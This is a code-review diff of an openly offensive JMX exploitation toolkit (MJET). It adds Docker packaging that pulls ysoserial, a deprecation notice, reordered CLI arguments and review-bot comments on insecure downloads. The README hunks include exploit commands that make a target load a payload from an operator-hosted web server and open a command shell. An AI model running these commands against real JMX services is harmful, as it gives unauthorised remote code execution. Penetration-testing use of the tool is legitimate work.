diff --git a/Dockerfile b/Dockerfile
index 4a227df..e5c63f2 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,9 +1,10 @@
-FROM ubuntu:latest
+FROM openjdk:8-alpine
 ENV TZ=Europe/Stockholm
 RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
-RUN apt-get update && apt-get install -y jython wget git && rm -rf /var/lib/apt/lists/*
 COPY . /app
-RUN wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
+RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O app/jython-standalone-2.7.0.jar \
+ && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
 EXPOSE 8000
 WORKDIR /app
-ENTRYPOINT ["jython", "mjet.py"]
+ENTRYPOINT ["java", "-jar", "jython-standalone-2.7.0.jar", "mjet.py"]
+CMD ["-h"]
diff --git a/README.md b/README.md
index e397ba1..7786474 100644
--- a/README.md
+++ b/README.md
@@ -4,10 +4,13 @@ MOGWAI LABS JMX Exploitation Toolkit
 MJET is a fork of [sjet](https://github.com/siberas/sjet/), which was developed by siberas but is no longer actively maintained.
 MJET is maintained by the MOGWAI LABS team which also provided most of the original sjet codebase.
-
 MJET allows an easy exploitation of insecure configured JMX services. Additional background
 information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) and [here](https://www.owasp.org/images/c/c1/JMX_-_Java_Management_Extensions_-_Hans-Martin_Muench.pdf).
+## !!! Important: This project is no longer maintained
+This repository is **no longer activly maintained**. We recommend using [qtcs beanshooter](https://github.com/qtc-de/beanshooter) instead.
+
+
 ## Prerequisites
 * [Jython 2.7](https://www.jython.org/)
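Review bot: In the Dockerfile hunk, the added `RUN wget "http://search.maven.org/…/jython-standalone-2.7.0.jar"` fetches the jar that the new ENTRYPOINT executes over plain HTTP and without any integrity check, so anyone on the build host's network path can swap the interpreter the image runs. Fetch it over `https://` and verify a pinned digest in the same layer, e.g. `&& echo "<EXPECTED_SHA256>  /app/jython-standalone-2.7.0.jar" | sha256sum -c - \` (placeholder digest, to be taken from a trusted copy). The retained ysoserial download still points at `master-SNAPSHOT`, a mutable artifact, so it deserves a pinned version and checksum as well. The `-O app/jython-standalone-2.7.0.jar` target is relative and only lands in `/app` because it runs before `WORKDIR /app`; `-O /app/jython-standalone-2.7.0.jar` would match the second download. No `USER` line is visible in this hunk, so the tool presumably runs as root inside the container.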
@@ -19,7 +22,7 @@ information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) a
 MJET implements a CLI interface (using [argparse](https://docs.python.org/3/library/argparse.html)):
 ```
-jython mjet.py targetHost targetPort password MODE (modeOptions)
+jython mjet.py targetHost targetPort MODE password (modeOptions)
 ```
 Where
@@ -97,7 +100,7 @@ h0ng10@rocksteady ~/w/mjet>
 Installation with JMX credentials (also needs a weak configuration of the server):
 ```
-h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD
+h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 install super_secret http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD
 mJET - MOGWAI LABS JMX Exploitation Toolkit
 =======================================
 [+] Starting webserver at port 8000
@@ -412,6 +415,23 @@ $
 Reference: https://www.optiv.com/blog/exploiting-jmx-rmi
+### Docker
+
+Build and run the docker image
+
+```bash
+# Build
+docker build -t mjet .
+# Run Help
+docker run mjet
+# Exploit example
+docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
+# Run Interactive into shell
+docker run --entrypoint /bin/sh -it mjet
+```
+
+By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it!
+
 ## Contributing
 Feel free to contribute.
@@ -424,6 +444,8 @@ Feel free to contribute.
 * **Arnim Rupp** - *Authentication support*
 * **Sebastian Kindler** - *Deserialization support*
 * **Karsten Zeides** - *JMX Message Protocol support, localhost bypass* [zeides](https://github.com/zeides)
+* **g60ocR** - *Docker file* [g60ocR](https://github.com/g60ocR)
+* **Morn98** - *Shell and RMI selection* [Morn98](https://github.com/Morn98))
 See also the list of [contributors](https://github.com/mogwailabs/sjet/graphs/contributors) who participated in this project.
diff --git a/mjet.py b/mjet.py
index e157b69..d3b4a98 100644
--- a/mjet.py
+++ b/mjet.py
@@ -380,7 +380,7 @@ def startShell(password, bean_server):
 if cmd == 'exit_shell':
 in_command_loop = False
 else:
- executeCommand(password, cmd, bean_server)
+ executeCommand(password, cmd, bean_server, args.shell)
 ### /SHELL MODE ###
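Review bot: The new call `executeCommand(password, cmd, bean_server, args.shell)` reads `args`, which is not a parameter of `startShell(password, bean_server)` as shown in the hunk header, so it presumably depends on a module-level `args` set by the argparse entry point. If `startShell` is ever reached before that global exists (the file imported as a module, or called from a test), this line raises NameError. Passing the value in explicitly removes the hidden dependency: `def startShell(password, bean_server, shell=None):` and `executeCommand(password, cmd, bean_server, shell)`, with the caller supplying `args.shell`. The body of startShell begins outside the hunk, so whether `args` is bound earlier in the function cannot be confirmed from here.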